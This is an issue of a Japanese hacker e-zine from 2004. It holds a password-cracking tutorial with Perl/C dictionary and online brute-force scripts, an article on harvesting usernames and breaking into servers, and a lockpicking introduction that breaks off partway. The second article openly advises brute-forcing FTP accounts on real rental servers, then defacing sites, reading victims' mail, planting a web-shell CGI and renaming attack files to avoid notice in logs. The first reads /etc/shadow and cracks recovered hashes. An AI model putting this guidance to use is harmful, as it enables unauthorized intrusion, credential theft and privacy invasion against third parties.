[-]=======================================================================[-]

                      Wizard Bible vol.7 (2004,1,17)

[-]=======================================================================[-]


x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x
x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x

  ---- 第０章：目次 ---

x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x
x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x

○第１章：Password crack入門                 Kenji Aiko 著

○第２章：ユーザ名の収集と利用                  J-Klein 著

○第３章：ピン・タンブラー錠のピッキング        Defolos 著

○第４章：セキュリティツール基礎問題           IPUSIRON 著

○第５章：お知らせ

○第６章：著者プロフィール


x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x
x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x

--- 第１章: Password crack入門 ---

著者：Kenji Aiko

x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x
x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x


■0x01.) はじめに

　自転車などによく使われるダイヤル式のチェーンロック(※１)。自転車を盗む
ためにはこれを解かなければならない。そんなときは、ダイヤルを 1111, 1112,
 1113, 1114, .... 6665, 6666 と試していけばいつか必ず解けます。つまりダイ
ヤル式チェーンロックを使っている自転車は時間さえあれば「盗める！」という
ことです(まぁペンチで切ればダイヤルもクソもないんですけどね) 。さて、もち
ろんこれは PC で使用されるパスワードでも同じことです。インターネットがこ
んなに当たり前に使用される現代。セキュリティの必要性にともなってパスワー
ドはさまざまなところで利用されています。ということで今回はパスワードクラ
ックについてやりたいと思います。パスクラについての詳細はセキュリティアカ
デメイアにパスワードクラック講座(※２)というとても有意義な記事があります
ので参照してください。

http://www.terao-inc.com/chiaro4.html                              ※１
http://akademeia.info/main/lecture3/tokubetu_password_cracking.htm ※２


■0x02.) 身近な暗号文

　もしあなたが Linux を使っているならばまず /etc/passwd もしくは /etc/shadow
を見てください( /etc/shadow は root権限 が必要です)。

　すると

-----
[bash-2.03]$ cat /etc/passwd
root:x:0:1:Super-User:/:/usr/bin/csh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
..........
..........
-----

というようなテキストが表示されるはずです。この中から自分のユーザーIDを探
すと

-----
kenji:3ckbO8536vo2.:13345:1001::kenji:kenji:......
-----

がみつかります。もし見つからない場合は

-----
[bash-2.03]$ perl -e "print join(':',getpwnam('kenji'));"
kenji:3ckbO8536vo2.:13345:1001::kenji:kenji:......
-----

で見つかるかも知れませんが、drill.hackerslab.org で試したところ。

-----
[level0@drill level0]$ perl -e "print join(':',getpwnam('level0'));"
level0:x:2000:2000::::/home/level0:/bin/bash[level0@drill level0]$
-----

となり案の定、暗号文が x となってました。この場合はしかたないのでどうにか
して /etc/shadow をみるしかないです(^^;

-----
[bash-2.03]# cat /etc/shadow
root:...........................
....................
.........................
kenji:3ckbO8536vo2.:13345:1001::kenji:kenji:......
-----

　※ログイン時の認証では パスワードとして入力された文字列をcrypt関数で暗
　　号化して出来た暗号文とここに保存されてる文字列を比較して一致したら正
　　しいパスワードが入力されたと判断するということが行われているようです。

　さて、暗号文がみつかりました。「 3ckbO8536vo2. 」です。これはDES暗号化
アルゴリズムを元にして作られたcrypt関数を使用しての暗号化後の文字列です。
つまり「 3ckbO8536vo2. 」がパスワードを暗号化した文字列(暗号文)であるわけ
です。では果たしてこの文字列からパスワードを推測することはできるでしょう
か。もしこの暗号文を眺めてみてパスワードが分かったならばおそらくあなたは
超人的な頭脳の持ち主でしょう。私のような凡人には無理ですので話を進めます(^^;

　確かに暗号文からパスワードを推測することは無理ですが、「ある文字列」を
同じようなアルゴリズムで暗号化して、もし「 3ckbO8536vo2. 」と一致したなら
ばその「ある文字列」はパスワードということになりますよね。ということで cr
ypt関数 を利用したプログラムを書いてみます。


■0x03.) crypt関数を使う

　サンプルは Perl と C で書きます。

　まず、Perlのサンプルを示します。

-----  crypt.pl
#!/usr/bin/perl

$str = crypt( $ARGV[0], $ARGV[1] );
print $str . "\n";
-----

○Linuxの場合

-----  実行例
crypt]$ chmod 755 crypt.pl
crypt]$ ./crypt.pl bbbbbbbb aa 
aaZbwOjboVU62
crypt]$
-----

○Windowsの場合

-----  実行例
C:\Documents and Settings\kenji>perl crypt.pl bbbbbbbb aa
aaZbwOjboVU62
C:\Documents and Settings\kenji>
-----

　次に、C言語のサンプルを示します。

-----  crypt.c
#include <crypt.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
        if(argc < 3){
                fprintf(stderr, "%s [string] [salt]\n",argv[0]);
                exit(1);
        }

        printf("%s\n", crypt(argv[1], argv[2]));
        return 0;
}
-----

-----  実行例
crypt]$ gcc -Wall crypt.c -lcrypt 
crypt]$ ./a.out bbbbbbbb aa
aaZbwOjboVU62
crypt]$
-----

　crypt関数にかんする詳細は(※３)をみてください。引数は２つあり、第一引数
が「平文(passwd)」、第二引数が「塩(salt)」となっています。crypt.pl の引数
をいろいろ変えて実行してみると分かると思いますが、暗号文の最初の２文字が
塩(salt) となっています。つまり暗号文をみただけで少なくとも salt は分かる
わけです。よってcrypt関数の第二引数に渡すべき値は分かるわけです。ではさっ
き出てきた「 3ckbO8536vo2. 」から見事パスワードを暴いてみましょう。

http://www.linux.or.jp/JM/html/LDP_man-pages/man3/crypt.3.html  ※３


■0x04.) パスワードクラック

　整理してみましょう。まず暗号文「 3ckbO8536vo2. 」があります。そして sa
lt は 「 3c 」ですね。つまり "3ckbO8536vo2." = crypt( $plain, "3c" ) が真
ならば $plain が見事パスワードということになります。さて、では $plain は
どこから持ってくるのか？　それは８文字以下の適当な文字列でも良いですし、
辞書から引っ張ってきてもＯＫです。ちなみに８文字以下の(べつに８文字以上で
もかまいませんが)すべての文字列を総当りで試していく方法を ブルートフォー
スアタック(Brute Force Attack：総当り攻撃) と呼び、辞書(いろんな単語が書
かれてあるテキストファイル)にある文字列を次々に試していく方法を ディクシ
ョナリーアタック（辞書式攻撃）と呼ぶようです。

　どちらでもかまわないのですが、総当りだとものすごい時間がかかる可能性が
あるのでここでは辞書を使ったパスクラを試してみましょう。そのためには辞書
が必要になりますので私が使っていたであろう辞書をＵＰしました。(最近ＨＤの
掃除をしたんですよ。そしたら出てきたんです^^;)

+----------------------------------------------------+
| http://kenjinet.s26.xrea.com/crypt/dictionary.html |
+----------------------------------------------------+

↑ＤＬ用のページを用意しました。辞書は８ＭＢほどありますので右クリックで
ＤＬしたほうが良いと思います。無事ＤＬが完了したらいよいよパスワードクラ
ック用のプログラムを書きます。

-----  crypt2.pl
#!/usr/bin/perl

open(FILE, $ARGV[1]) or die "file open error!\n";

while( $line = <FILE> ){
	chomp($line);
	if( $ARGV[0] eq crypt($line, $ARGV[0]) ){
		print "Passwd Get!  " . $line . "\n";
		exit;
	}
}

close(FILE);

print "Passwd Not Found!\n";

exit;
-----

-----  実行例
C:\Documents and Settings\kenji>perl -cw crypt2.pl
crypt.pl syntax OK
C:\Documents and Settings\kenji>perl crypt2.pl 3ckbO8536vo2. dictionaryA.txt
Passwd Get!  xhXOFlrW
C:\Documents and Settings\kenji>
-----

　見事！パスワードが取得できました(最近の PC ならば数秒で解けるはずです)。
ではプログラムの説明をします。まず第二引数に辞書ファイルを、第一引数に暗
号文を渡します。辞書の一行ずつを $line にいれていき chomp で改行を省いた
あとに crypt に渡していきます。crypt の第二引数には暗号文がそのまま渡され
てますが、これは結局最初の２文字しか使われないので同じことです。そしてそ
れが crypt の戻り値が暗号文と同じならばパスワード取得！となります。


■0x05.) crypt関数 　～其の弐～

　さっき「DES暗号化アルゴリズムを元にして作られたcrypt関数」というような
メチャクチャ誤解を招く書き方をしてしまいましたが正確には「DES暗号化アルゴ
リズムを元にして作られたアルゴリズム」ということです。(でもこの言い方もや
やこしいですよね) んで、crypt関数は DES 以外にも暗号化のアルゴリズムが使
えます。それは MD5 です。これについての詳細は RFC1321(MD5 message digest
 Algorythm) を参照してください。では MD5 のアルゴリズムを利用した暗号化を
試してみたいと思います。しかし、私が試してみたところ Linux ではちゃんと 
MD5 で暗号化できたのですが、 Windows の Active Perl ver 5.6.1 では無理で
した(なんでだー)。もしかしたら Linux でも出来ないことがあるかも知れない
です。

-----  mcrypt.pl
#!/usr/bin/perl

$str = crypt($ARGV[0], '$1$'.$ARGV[1].'$');

print $str . "\n";
-----

-----
[kenji@localhost md5]$ chmod 755 mcrypt.pl
[kenji@localhost md5]$ ./mcrypt.pl dddddd eeeee
$1$eeeee$oTyGTVdlfSpVHNnWH40431
[kenji@localhost md5]$ 
-----

-----mcrypt.c
#include <crypt.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
        char salt[16];
        unsigned len;

        if(argc < 3){
                fprintf(stderr, "%s [string] [salt]\n",argv[0]);
                exit(1);
        }

        if((len = strlen(argv[2])) > 8) len = 8;

        memset(salt, '\0', sizeof(salt));
        memcpy(salt, "$1$", 3);
        memcpy(salt + 3, argv[2], len);
        salt[ 3 + len ] = '$';

        printf("%s\n", crypt(argv[1], salt));
        return 0;
}
-----

-----  実行例
[kenji@localhost md5]$ gcc -Wall mcrypt.c -lcrypt
[kenji@localhost md5]$ ./a.out dddddd eeeee
$1$eeeee$oTyGTVdlfSpVHNnWH40431
[kenji@localhost md5]$ 
-----

　私が現在使っている Linux では /etc/shadow が次のようになっています(暗号
文などは多少変更しています)。

-----  実行例
[root@localhost /]# cat /etc/shadow
root:$1$Up8MhYQi$J4ykagSTaqND0Emv3VCPf.:12398:0:99999:7:::
bin:*:12398:0:99999:7:::
postfix:!!:12398:0:99999:7:::
.............
..............
kenji:$1$2i9i8SQn$Rp7CfDb7nsHRB8sy0JIogn:12398:0:99999:7:::
-----

　このように DES アルゴリズムではなく MD5 アルゴリズムが使われている場合
もあるようです。


■0x06.) オンラインパスワードクラック

　今度はネットワークを経由してのパスワードクラックを試してみます。しかし
実際に運営されているＨＰで試すことはさすがにできないので自前でサーバを用
意しなければなりません。私は WindowsXP + AN HTTP(※４) で試しました。設定
に関する詳細は KENT氏 のＨＰの「自宅のマシンWWWサーバ化計画」(※５)が大変
参考になりました。まずはターゲットの CGI を作成します。

http://www.st.rim.or.jp/~nakata/  ※４
http://www.kent-web.com/www/      ※５

-----  target.cgi
#!/usr/bin/perl

$str = "NO!";

if($ENV{'REQUEST_METHOD'} eq "POST") {
	read(STDIN, $buf, $ENV{'CONTENT_LENGTH'});
	if($buf eq "pwd=dJ") { $str = "OK!"; }
}

print "Content-Type: text/html\r\n\r\n";
print << "HTML";
<html>
<body>
<p>$str</p>
<h3>パスワードクラックテスト</h3>
<form method="post" action="./target.cgi">
<input type="password" name="pwd" size="8" maxlength="8" value="">
</form>
</body>
</html>
HTML

exit;
-----

　パスワードは"dJ"とします(dictionaryA.txt のちょうど100行目にあります)。
正しいパスワードが入力されたら"OK!"という文字列を出力し、そのほかはすべて
"NO!"という文字列を出力するようにしています。このCGIをパスワードクラック
のターゲットとします。では今度は攻撃するプログラムをかきます。

-----  crypt3.pl
#!/usr/bin/perl

use Socket;

#-- 初期設定
$server = 'localhost';
$path   = '/target.cgi';

open(FILE, $ARGV[0]) or die "file open error!\n";

while( $line = <FILE> ){
	chomp($line);
	$body = 'pwd=' . $line;
	$len  = length($body);

	#-- データ作成
	$data  = "POST $path HTTP/1.1\n";
	$data .= "Host: localhost\n";
	$data .= "Content-Length: $len\n";
	$data .= "\n";
	$data .= $body;

	#-- 改行を"\r\n"に変更
	$data =~ s/\x0D\x0A|\x0D|\x0A/\r\n/g;

	#-- 接続処理
	if((Connect($server, 'http', 'tcp', 80)) != 0){
		print "Connect ERROR!\n";
		exit;
	}

	#-- 送信
	print SOCK "$data";

	#-- レスポンスを受け取る
	while($res = <SOCK>){
		$res =~ s/\x0D\x0A|\x0D|\x0A/\n/g;
		if($res =~ /<p>OK!<\/p>/){
			print "SUCCESS! \n" . "Passwd is $line.\n";
			exit;
		}
		if($res =~ /<\/html>/) { last; }
	}
	close(SOCK); select(STDOUT);
}

close(FILE);
exit;


#################################################
# Connect サブルーチン
#################################################
sub Connect{

	my($port, $struct);

	if(($port = getservbyname($_[1], $_[2])) == NULL){
		$port = $_[3];
	}
        $struct = sockaddr_in($port, inet_aton($_[0]));
        socket(SOCK, PF_INET, SOCK_STREAM, 0) || return(-1);
        connect(SOCK, $struct) || return(-2);
        select(SOCK); $| = 1; select(STDOUT);

	return(0);
}
-----

-----  実行例
C:\Documents and Settings\kenji>crypt3.pl dictionaryA.txt
SUCCESS!
Passwd is dJ.
C:\Documents and Settings\kenji>
-----


　このプログラムの説明は Wizard Bible vol.5「HTTP入門　～連続投稿の仕組み
～」を参照してください。このプログラムを試したところ私の PC ではたった100
行程度 の文字列しか試さないのに 10秒 ほどかかってしまいました(^^; ローカ
ルでやるのと比べると全然遅い(当たり前ですが)です。このプログラムだと一度
の接続にたいして一回のリクエストしか送ってないので、接続維持を利用してち
ょっと工夫すればもっと速くなりそうですが、やはりスピードはローカルでやる
ほうが断然速いのは仕方ないです。

　ネットワークを経由するのでプログラムは長くなりますが、結局やってること
は同じです。ちょっと工夫を加えればBasic認証などにも対応できそうですが、そ
のへんよく分からないので止めときます(^^;


■0x07.) 最後に

　さて、いかがだったでしょうか。パスワードクラックツールは John the Ripp
er, L0phtCrack(?) などいろいろあるようですが、実際プログラムを書いてみる
とさらに楽しめると思います。John the Ripperと解析時間を比べてみるといった
楽しみ方もありますし(ただJohnはムチャクチャ速いですよ) 本格的にパスクラツ
ールを作るんならやはり DES暗号化アルゴリズム などを学ぶ必要があるでしょう。
これを機会に「暗号理論」などに興味を持ってもらえれば幸いです。私のサイト
(http://kenjinet.s26.xrea.com/)に暗号アルゴリズム解説のページがありますの
でよければこちらも参考にしてください。最後になりましたが、ここまで付き合っ
て読んでくださった方有り難うございました。

　では、また会う日まで...



x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x
x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x

--- 第２章: ユーザ名の収集と利用 ---

著者：J-Klein

x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x
x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x


■0x01.) はじめに

　今回はあるサーバに属するユーザ名を集める方法を一つ紹介したいと思います。
その方法は Web サーバに対してしか使えないものの、世間に広まっているレンタ
ルサーバ等の加入ユーザ名を集める場合などにはかなり効率的な結果を出してく
れます。その上ターゲットサーバにはユーザ名を収集したことがばれません。

　その方法はとても簡単なので、方法を紹介するだけでは記事として面白くあり
ません。ですから今回はそのユーザ名の利用法にも触れたいと思います。大部分
を自動化できるようにプログラムも容易したので、スクリプト・キディな方はそ
ちらもどうぞ。


■0x02.) ユーザを列挙する 

　まず、ユーザを列挙しなくてはいけません。ユーザを列挙する方法には何通り
も有ります IPUSIRON 氏のサイト（参考１）のセキュリティ講座『ユーザ・グル
ープ列挙編』にある方法を紹介しましょう。

(1)  推測によるユーザ・グループ列挙
(2)  メールアドレス利用によるユーザ・グループ列挙
(3)  SMTPのVRFYまたはEXPNコマンド利用によるユーザ・グループ列挙
(4)  finger 利用によるユーザ列挙
(5)  rwhoまたはrusers利用によるユーザ・グループ列挙
(6)  Apache UserDir機能からのユーザ列挙
(7)  Solaris in.ftpdの脆弱性利用によるユーザー列挙
(8)  RedHat Linux 7.[01]のPAM qpopper（RPM版）の脆弱性利用によるユーザー列挙
(9)  sid2user/user2sid利用によるユーザー列挙
(10) enum利用によるユーザー列挙 
(11) ntdump利用によるユーザー列挙
(12) ldp.exe利用によるユーザー列挙
(13) GetAcct利用によるユーザー列挙

　いろいろ有りますね。これらの解説はIPUSIRON氏のサイト等を参照して下さい。
そして今回紹介する方法は上記リストの (6) の Apache UserDir 機能からのユー
ザ列挙の応用です。これはいたって簡単で、ターゲットサーバからばれる事も無く、
効率的にユーザを列挙出来ます。しかもある条件の中では法律には違反しません。
この条件は記事最後の『注意』を御覧下さい。

　では、その方法を紹介しましょう。使用するのは Google のみ。Google には検
索オプションとしてドメイン内検索というものが有ります。これは xxx.com とい
うサイトの中にあるファイルのみを検索対象にする仕組みです。これは Google 
のトップページから『検索オプション』に進みドメインを設定するか、検索クエ
リに『site:<target.com>』と入力すれば利用する事が出来ます。例えば次に示す
方法を試して下さい。ちなみにここでテストに使用するターゲットサーバは targ
et-server.com とします。

(1) google に次に示す検索クエリを送る　「site:target-server.com b」
(2) 検索結果である http://targetserver.com/xxx/ の xxx がユーザ名

　独自ドメインではなく、レンタルサーバであればほとんど URL のうちの最初の
ディレクトリはユーザ名を示します。例えば私のサイトがあるサーバ 
"members.jcom.home.ne.jp" をターゲットとして上記方法で検索すると 40,100 
件の検索結果が得られます。もちろん大部分は同一ユーザのサイトですが、全て
を調べれば大量のユーザ名が得られる事は容易に想像出来ます。この方法はシン
プルですし、目新しい技術も無いですがメリットは以外と多いのです。

　例えば

・ 相手サーバに一度も触れていない
・ ターゲットサーバを決めて収集できる
・ 合法的である（条件による）

のようなものが挙げられるでしょう。それにしても手動で行うと時間も手間もか
かります。Perl などのプログラミング言語が出来ればプログラムを組んで自動化
することは容易です。そこで試しに私が作ってみました。

○google-ulist.pl
http://members.jcom.home.ne.jp/j-klein/src-box/google-ulist.pl

　これは実行時の引数にターゲットホスト名を与えるとそのホストのユーザ名を
大量に集めてくれます。そして "ホスト名.txt" という名前で保存してくれます。
大変便利で効率的に集める事ができますが、このプログラムは合法ではありませ
ん（この記事の最後にある『注意』とソースコード冒頭の説明を読んで下さい）。

-----  実行例
$ perl google-ulist.pl members.jcom.home.ne.jp
-----

　私がテスト実行したところ、重複無しで 1851 件のユーザ名が集まりました。
そしていろんなレンタルサーバで同様のことを繰り返したところ 29137 件のユー
ザ名が集まりました(注1)。これだけ有るとユーザのリストもいろいろな利用価値
を見出せます。次の章で利用価値について考えてみましょう。

(注1) "members.tripod.com" や "homepage2.nifty.com" など 58 のサーバを調
べた結果です。


■0x03.) ユーザリストの利用価値 

　『どんなに集めても分かるのはユーザ名だけでは…』そんな声も聞こえてきそ
うですが、今重要視すべきなのはユーザ名が大量にあることでしょう。実際 1 つ
 2 つ分かってもメリットは小さいですが 1000 件単位で見つかると話は違います。
考えられる利用方法をあげてみましょう。

(1) JOE アカウント探し
(2) パスワード解析辞書として使用する
(3) ユーザ名からメールアドレスに変換してスパムメールリスト

　一つ目の JOE アカウント探しは文字どおりですね。これに関しては後で詳しく
書きます。二つ目の『パスワード解析辞書として使用する』というのは未来への
投資です。ユーザ名に選ばれるものはパスワードにもなりやすいということを考
えれば当然有力な辞書として機能することがわかるでしょう。最後のはスパムメ
ールの対象リストとして使用する方法です。

　この中で一番（攻撃者の立場から）有意義な利用法はどのようなものでしょう
か。もちろん、JOE アカウント探しでしょう。JOE アカウントでサーバに侵入し、
あわよくば権限昇格してサーバを乗っ取るような事も可能です。そうすればあと
はしたい放題です。


■0x04.) JOE アカウント探しと利用 

　ユーザのリストがあれば JOE アカウントを探すのも簡単です。なぜならこの方
法で探したユーザはほぼ確実に FTP アカウントも持っているからです。FTP に対
してユーザ名と同様のパスワードを送信し、成功すれば JOE アカウント発見です。
簡単ですね。

　手動でやるとかなり面倒なことですので、これも自動化してしましょう。

○ftp-joechek.c（JOE検索用プログラム）
http://members.jcom.home.ne.jp/j-klein/src-box/ftp-joecheck.c

　使用方法はソースコードの冒頭に書いてありますので参照して下さい。ちなみ
に安全性を考え、プロキシを通さないと実行できない様にしてあります。ですの
で最低一つのプロキシを指定して下さい。そして『1. ユーザを列挙する』で作成
したユーザリストファイルをそのまま使用出来ます。その際は次のように実行し
て下さい。

-----  実行例
$ cat targer-server.com.txt | ftp-joecheck target-server.com proxy-server
-----

　これで target-server.com の列挙済みユーザの中から JOE アカウントを見つ
けてくれます。が、このような事をする前に一つ考えてほしい事が有ります。そ
れはターゲットサーバが JOE アカウントを許可しているかどうかです。例えばユ
ーザ列挙で紹介したサーバ members.jcom.home.ne.jp はユーザ登録時にユーザ名
と同様のパスワードを指定するとエラーになり登録出来ません。ですからいくら
この方法を使って JOE を探しても見つからないばかりか、無駄に「警告を受ける」
または「逮捕」なんてことにもなりかねません。JOE アカウントを許可している
かどうかは実際にそのサーバに加入している知人にテストしてもらうのが一番で
しょう。どんなときでも調査が大事になるという事です。

　さて、仮に JOE アカウントが見つかったとしましょう。そこからあなたが出来
る事は何があるでしょうか。思い付く事を列挙してみましょう。

●Web ページの改竄 

　FTP アカウントは手に入れているのですから簡単でしょう。個人的にはあまり
楽しく無いのでお勧めしませんが…。

●Warez 用の FTP アカウント 

　Warez には参加した事無いので詳細は分かりませんがこのような利用法もある
でしょう。ただし、このアカウントが長期的に使用されていないことが条件です。
でないと、侵入された事が本物のユーザにばれてしまい、パスワード変更されて
しまいます。

●リモートログイン 

　おそらくこれが最も期待する利用方法でしょう。手に入れたアカウントのある
サーバが telnet や ssh 等のリモートログインを許可している場合にこの方法が
利用出来ます。というのもユーザ名とパスワードは既に分かっているのですから、
堂々とログインすれば良いのです。

　そのサーバに入る事が出来ればする事は一つですね。管理者権限の奪取です。そ
の方法はここでは紹介しきれませんが、ローカルからの奪取の方が簡単なので挑戦
する価値は有るかもしれません。

●メールの盗聴

　そのサーバがメールアカウントも発行していれば POP を利用してそのアカウン
ト宛のメールを盗み見る事が出来ます。他人のプライバシーに興味が無くてもメ
ールの盗聴には価値があるときが有ります。何かの会員として加入した際の確認
メールが有った場合、その会員情報（あわよくばパスワードも）手に入れる事が
出来るからです。例えば、いくつかのレンタルサーバを利用していた場合、芋づ
る式に全てのサーバへのアカウントを手に入れる事が可能です。他にもそのユー
ザの本名、役職、電話番号等の個人情報も手に入る確立が高いです。

●CGI が使えるならば 

○ cgi2shell.cgi を使用して仮想シェルを構築

　cgi2shell.cgi というのは PaiN 氏（参考２）が作成した Perl スクリプトで、
CGI 上でシェルのような環境を作るプログラムです。UNIX 用と Windows 用があ
るので是非手に入れておきましょう。

○ CGI + Sendmail で偽造メール 

　そのサーバが CGI と sendmail(qmail でも可) を許可していれば完全にあなた
の身元を隠して偽造メールを送る事が出来ます。つまり、メール送信用の CGI を
作成して FTP でアップロードしてその CGI にアクセスしてメールを送信すれば
よいのです。

○ さらにユーザを列挙する 

　CGI を利用して完全なユーザリストを作成出来ます。これは先ほど紹介した
cgi2shell.cgi で "cat /etc/passwd" というコマンドで作成するか、私が作成し
た ulist.cgi（http://members.jcom.home.ne.jp/j-klein/src-box/uid-lister.cgi）
を利用すれば可能です。私が作成した ulist.cgi は UID 総当たりによるユーザ
列挙プログラムです。どちらにせよ、Shadow 化されていなければ暗号化されたパ
スワードが手に入りますので John The Ripper などでパスワードクラックを行う
ことが出来ます。

　蛇足ですが、CGI を使用する際のアドバイスをしておきます。攻撃用の CGI を
使う際はくれぐれも怪しい名前でアップロードしないで下さい。例えば前述の cg
i2shell.cgi などをそのままの名前で使用すると HTTP サーバのログに残ってし
まい、管理者が見た時に怪しく思います。例えば char2.cgi などという名前でア
ップして使用すれば後からログを見ても怪しまれません。

　他にも FTP バウンスアタックに使用したり、本物のユーザが設置した CGI の
ログを盗んだりといろいろな利用法があるでしょう。是非とも考えてみて下さい。
そして是非教えて下さい。


■0x05.) 注意 

　ここで、合法かどうかの条件を記しておきます。Google へクエリを送信しユー
ザを列挙する際に手動で集めるのは通常の検索と同様なので問題有りません。し
かしこれをプログラムで組んで自動で収集するとサービス規約に違反するようで
す。詳しくは次のページの『自動クエリの禁止』を見て下さい。つまるところプ
ログラムから検索を行ってはいけないいけないということでしょう。

○Google サービス利用規約
http://www.google.co.jp/intl/ja/terms.html

　もう一つ、FTP で JOE アカウントを探すのはそれ自体が違法です。最近の IDS
 （侵入検知システム）は同じ IP アドレスから何度もログインがあり、そのたび
に失敗しているとアラートを出すものも有ります。

参考１："Security Akademeia" - http://akademeia.info/
参考２："- Hex51 -" - http://hex51.darktech.org/



x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x
x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x

--- 第３章: ピン・タンブラー錠のピッキング ---

著者：Defolos

x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x
x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x


■0x01.) はじめに

　だれしもピッキングという言葉を一度は聞いたことがあると思います。ドラマ
とかでよく鍵をなしに錠を開けたりしてますよね。あれのことです。アメリカで
毎年催されているハッカーの祭典であるDefConでも、毎回ピッキング講座やコン
テストが行われており、ハッカーの基礎スキルともいわれています。
　本格的にピッキングを習おうとすれば非常に難しい技術ですし、お金もかかり
ます。しかし、南京錠ぐらいなら手製のツールとちょっとの努力で開錠できるで
しょう。ここでは「ちょっとピッキングを体験してみたい」人に向けた簡単な解
説をしていきたいと思います。

　これを書いてる私も本格的にピッキングを習ったわけでもなく、技術も知識も
適当ですのでいい加減なこと書いてるかもしれませんが、ご了承ください。


■0x02.) 錠の種類

　ピッキングをするには最初に錠の種類を見分ける必要があります。
　錠の種類と見分け方を以下に記述します。

●シリンダー錠：鍵を刺して回すタイプの錠

　シリンダータイプの錠は最も一般的なタイプの錠です。刺して回す錠はまずこ
のタイプです。見つけるのは簡単ですのですので実際に見てもらった方が早いで
す。

○ピンタンブラー

　鍵穴から円柱状の突起（ピン）がみえるものです。シリンダー錠の中でも最も
一般的です。南京錠や玄関の鍵などに使われています。

参照→http://wizardbible.org/7/image/picture_1.GIF

○ダブル・ピンタンブラー

　単純にピンを上下に配置しただけですが、かなりの難易度を誇ります。車の鍵
などのセキュリティーを重視する場合に多く使われます。

○ディスクタンブラー

　鍵穴から板状の部品がみえるものです。自転車のチェーンやロッカーの錠など
のセキュリティーを重視しない場所に使われます。

参照→http://wizardbible.org/7/image/picture_2.GIF

○ダブル・ディスクタンブラー

　鍵穴から上下互い違いに板状の部品がみえるものです。安価なわりにはセキュ
リティーが確保できたために日本中に普及しました。難易度は高いですが練習次
第では簡単に開けれます。

○チューブラー

　円形の鍵穴に放射状にタンブラーが並んでいるものです。平均的に難易度が高
く、自動販売機などの最もセキュリティーを重視する場所に使われます。見慣れ
ない感じがしますが、構造自体はピンタンブラーと変りありません。

参照→http://wizardbible.org/7/image/picture_3.GIF


●特殊錠：シリンダータイプ以外

○パズルキー

　自転車のチェーンなどに利用されている数字を合わせることで開錠するタイプ
の錠です（セサミロック）。あるいは、押しボタン式の錠です（押しボタン錠）。

○自転車の前輪の錠

　そのままです。自転車の前輪のアレです。セキュリティーに問題があるため、
今ではほとんど使われていないと思います。

○バイオメトリックス

　指紋感知式の錠や網膜での認証システムです。コストの問題などがあり、実際
に使われるときも他の錠などと組み合わせて使われることが多いです。


■0x03.) 必要な道具 

　次に鍵開けに必要な道具を紹介します。ピッキングにはピックとテンションの
２つのツールを使用します。ピックやテンションにも色々な種類があります。

　以下に一部を紹介します。

●ピック（Pick）

　ピッキング（Picking）の基本ツールです。ピッキングの名の由来でもあります。
ピンを押し上げるための細い棒状のものです。

○フックピック

　主にピンタンブラーに使用するピックで、凡用性があります。

参照→http://wizardbible.org/7/image/picture_4.GIF

○ダイヤピック

　ピンタンブラーやディスクタンブラーに使用します。フックピックと同じく最
も凡用性があります。

参照→http://wizardbible.org/7/image/picture_4.GIF

○レークピック

　ディスクタンブラー専用のピックです。鍵穴内部をひっかくような動作で開錠
するレーキング（Raking）のためのピックです。非常に短時間で開けることがで
きますが、他の錠には効果が薄いです。

参照→http://wizardbible.org/7/image/picture_4.GIF


●テンション（Tension）

　シリンダーに回転の力をかけるのに使います。厳密には、内筒を強い力で回す
というより、押し下げたあるいは押し上げたタンブラーがバネの力で戻ってこな
いようにする目的に使います。一般的にL字型をしています。「テンション7割」
といわれるほど重要なツールです。

○ピンテンション

　L字型の最も一般的なテンション

参照→http://wizardbible.org/7/image/picture_5.GIF

○フェザー・タッチ・テンション

　微妙な力加減が要求されるときに使います。マッシュルームピンなどのピッキ
ング対策された錠を開けるにはこのテンションを使います。

○円形テンション

　テンションの中でも最も操作性のいいテンション。名の通り丸い形をしていま
す。


　ツールを買う場合、テンションの多い物を選びましょう。というのはテンショ
ンはピック以上に重要ですので、テンションの多いセットを売り出す会社はその
重要性を理解していると思って良いからです。


■0x04.) ツールの自作

　本来ピッキングツールは売られているものを買うべきですが、ちょっと試して
みたい人や18歳未満の人はピックツールを自作するしかないでしょう。

　以下に使える材料、加工の方法を記述します。

参照→http://wizardbible.org/7/image/picture_6.GIF

●ヘアピン

